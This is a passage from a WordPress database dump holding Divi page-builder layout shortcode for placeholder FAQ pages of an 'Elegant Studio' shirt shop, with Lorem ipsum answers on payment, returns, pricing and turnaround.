custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"8\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"36px\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|tablet\" custom_margin=\"-10px||0px|\" custom_padding=\"0px||0px|\" text_font_size_tablet=\"32px\"]\r\n\r\n<p>Payment</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"3_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How much do I have to pay to get started?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"2px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"What is the 3% under allowance policy?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How do I go about making payment?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"128px||78px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"90px||78px|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"8\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"32px\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|desktop\" custom_margin=\"-10px||0px|\" custom_padding=\"0px||0px|\"]\r\n\r\n<p>Returns</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"3_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"If I don\'t like my shirts, can I return them?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"2px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\"][et_pb_column type=\"4_4\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/1-1.jpg\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"on\" parallax_method=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"190px||190px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|tablet\" custom_padding_tablet=\"120px||120px|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"36\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|desktop\" custom_margin=\"||0px|\" custom_padding=\"0px||0px|\"]\r\n\r\n<p>Still need help? Send us a note!</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans||||\" text_font_size=\"28\" text_text_color=\"#cccccc\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_last_edited=\"on|tablet\" custom_margin=\"34px||0px|\" custom_padding=\"0px||0px|\" max_width=\"680px\" text_font_size_tablet=\"24\"]\r\n\r\n<p>For any other questions, please write us at info@elegant.studio or call us on +39 123 456 789</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans||||\" text_font_size=\"28\" text_text_color=\"#dac8c1\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_last_edited=\"on|desktop\" custom_margin=\"34px||0px|\" custom_padding=\"0px||0px|\" max_width=\"680px\"]\r\n\r\n<p><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/022-1.png\" alt=\"022\" width=\"9\" height=\"18\" class=\"alignnone size-full wp-image-18669\"></a><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-3.png\" alt=\"032\" width=\"23\" height=\"18\" class=\"alignnone size-full wp-image-18668\"></a><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/051.png\" alt=\"051\" width=\"19\" height=\"18\" class=\"alignnone size-full wp-image-18670\"></a> <a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/041-1.png\" alt=\"041\" width=\"19\" height=\"18\" class=\"alignnone size-full wp-image-18671\"></a></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','FAQ #1','','publish','closed','closed','','faq-1','','','2016-06-29 02:23:41','2016-06-29 02:23:41','',0,'https://companyregistration.online/et_pb_layout/faq-1/',0,'et_pb_layout','',0),(25343,1,'2016-06-29 02:24:17','2016-06-29 02:24:17','[et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"129px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"64px||0px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"10em\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1em\" text_font_size_tablet=\"4em\" text_font_size_last_edited=\"on|tablet\"]\n\n<p>FAQs</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"37px||149px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_width_px=\"940px\" custom_padding_tablet=\"0px||64px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans||||\" text_font_size=\"24\" text_text_color=\"#888888\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" max_width=\"940px\" text_font_size_tablet=\"18\" text_font_size_last_edited=\"on|tablet\"]\n\n<p>Frequently Asked Questions.<br /> Here are some common questions about Elegant Studio.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f7f7\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"130px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"90px||0px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How is my price determined?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"2px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can I get my order sooner?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"What file-format should I submit?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"What is your minimum order quantity?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How long is turnaround time?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How much do I have to pay to get started?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"What is the 3% under allowance policy?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"133\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/3-1.jpg\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"on\" parallax_method=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"190px||190px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|tablet\" custom_padding_tablet=\"120px||120px|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"36\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|desktop\" custom_margin=\"||0px|\" custom_padding=\"0px||0px|\"]\n\n<p>Still need help? Send us a note!</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans||||\" text_font_size=\"28\" text_text_color=\"#cccccc\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_last_edited=\"on|tablet\" custom_margin=\"34px||0px|\" custom_padding=\"0px||0px|\" max_width=\"680px\" text_font_size_tablet=\"24\"]\n\n<p>For any other questions, please write us at info@elegant.studio or call us on +39 123 456 789</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans||||\" text_font_size=\"28\" text_text_color=\"#dac8c1\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_last_edited=\"on|desktop\" custom_margin=\"34px||0px|\" custom_padding=\"0px||0px|\" max_width=\"680px\"]\n\n<p><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/022-1.png\" alt=\"022\" width=\"9\" height=\"18\" class=\"alignnone size-full wp-image-18669\"></a><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-3.png\" alt=\"032\" width=\"23\" height=\"18\" class=\"alignnone size-full wp-image-18668\"></a><a href=\"#\"><img style=\"margin-right: 40px\" 